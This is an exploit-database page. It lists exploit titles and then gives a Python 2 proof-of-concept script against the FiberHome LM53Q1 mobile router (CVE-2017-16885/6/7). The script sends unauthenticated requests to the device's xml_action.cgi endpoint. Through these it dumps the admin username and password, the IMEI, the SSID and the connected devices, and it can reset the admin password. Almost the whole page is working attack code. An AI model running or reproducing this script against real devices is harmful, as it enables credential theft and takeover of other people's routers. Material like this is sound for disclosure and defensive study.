Invision Power Board 4.2.1 - 'searchText' Cross-Site Scripting
Invision Power Board (IP.Board) 4.2.1 - 'searchText' Cross-Site Scripting

TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)
TOTOLINK Routers - Backdoor / Remote Code Execution

IP.Board 4.x - Persistent Cross-Site Scripting
Invision Power Board (IP.Board) 4.x - Persistent Cross-Site Scripting

IP.Board 4.1.4.x - Persistent Cross-Site Scripting
Invision Power Board (IP.Board) 4.1.4.x - Persistent Cross-Site Scripting

NETGEAR R7000 - Command Injection (PoC)
NETGEAR R7000 - Command Injection

WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass  / SQL Injection
WordPress Plugin Smart Google Code Inserter < 3.5 - Authentication Bypass / SQL Injection
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration
Photos in Wifi 1.0.1 - Path Traversal
SonicWall NSA 6600/5600/4600/3600/2600/250M - Multiple Vulnerabilities
FiberHome LM53Q1 - Multiple Vulnerabilities
WordPress Plugin LearnDash 2.5.3 - Arbitrary File Upload
Vanilla < 2.1.5 - Cross-Site Request Forgery

Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE (PoC)
Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE

Joomla! 3.7.0 - 'com_fields' SQL Injection (PoC)
Joomla! 3.7.0 - 'com_fields' SQL Injection

Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)
Apache Struts 2.3.x Showcase - Remote Code Execution

AIX - execve /bin/sh Shellcode (88 bytes)

Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
2018-01-09 05:02:30 +00:00

152 lines
No EOL
7.9 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
# /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$
# | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$
# | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$
# | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/
# | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$
# | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$
# | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/
# |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/
# | $$
# | $$
# |__/
# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC
import requests,sys,getopt,socket,struct
#Declaring IP as our global variable to probe for Gateway IP of Device
global ip
#Getting Gateway IP Address
def get_default_gateway_linux():
with open("/proc/net/route") as fh:
for line in fh:
fields = line.strip().split()
if fields[1] != '00000000' or not int(fields[3], 16) & 2:
continue
return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
return;
ip = get_default_gateway_linux()
exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";
#Function to get Device Statistics
def get_device_details():
gateway = None
hardware = None
device_name = None
devices_all = ''
version = None
gateway = None
ssid = ''
dns1 = None
dns2 = None
requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
api_response = requestStatus.content.replace('\t','').split('\n')
for results in api_response:
if "<hardware_version>" in results:
hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
if "<device_name>" in results:
device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
if "<version_num>" in results:
version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
if "<gateway>" in results:
gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
if "<ssid>" in results:
ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
if "<dns1>" in results:
dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
if "<dns2>" in results:
dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
if "<IMEI>" in results:
imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
print "\n=============================================="
print "\nHardware Version of Device : "+hardware+"\n"
print "\nName of Device : "+device_name+"\n"
print "\nSoftware Version of Device : "+version+"\n"
print "\nIMEI of Device! : "+imei+"\n"
print "\nWiFi SSID of Device : "+ssid+"\n"
print "\nGateway of Zong Device : "+gateway+"\n"
print "\nDNS Primary of Device : "+dns1+"\n"
print "\nDNS Secondary of Device : "+dns2+"\n"
print "\n=============================================================================\n";
if "<known_devices_list>" in results:
devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
print "\nConnected Devices to WIFI\n"
print devices_all
#Function for getting User Account Details to login to Portal
def get_user_account_details():
request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")
admin_details = request.content.replace('\t','').split('\n')
for admin_login_response in admin_details:
if "<router_username>" in admin_login_response:
username = admin_login_response.replace('<router_username>','').replace('</router_username>','')
if "<router_password>" in admin_login_response:
password = admin_login_response.replace('<router_password>','').replace('</router_password>','')
print "\nUsername of Device Web Application :\n"+username+" "
print "Password of Device Web Application :\n"+password+"\n"
print "\n=============================================================================\n";
#Function to change Administrator Password
def change_admin_password():
set_password = raw_input("\nEnter Password to Change : ")
password = str(set_password)
xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"
headers = {'Content-Type': 'application/xml'}
change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
print "Password Changed!"
def main():
print exploit_title
print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"
get_option = raw_input("\n Enter Option : ");
option = int(get_option)
if get_option == "1":
get_user_account_details()
raw_input("\n Press Any Key To Exit");
elif get_option == "2":
get_device_details()
raw_input("\n Press Any Key To Exit");
elif get_option == "3":
change_admin_password()
elif get_option == "":
print "Good Bye!";
else:
print "Goodbye!";
main()
Reference in a new issue View git blame Copy permalink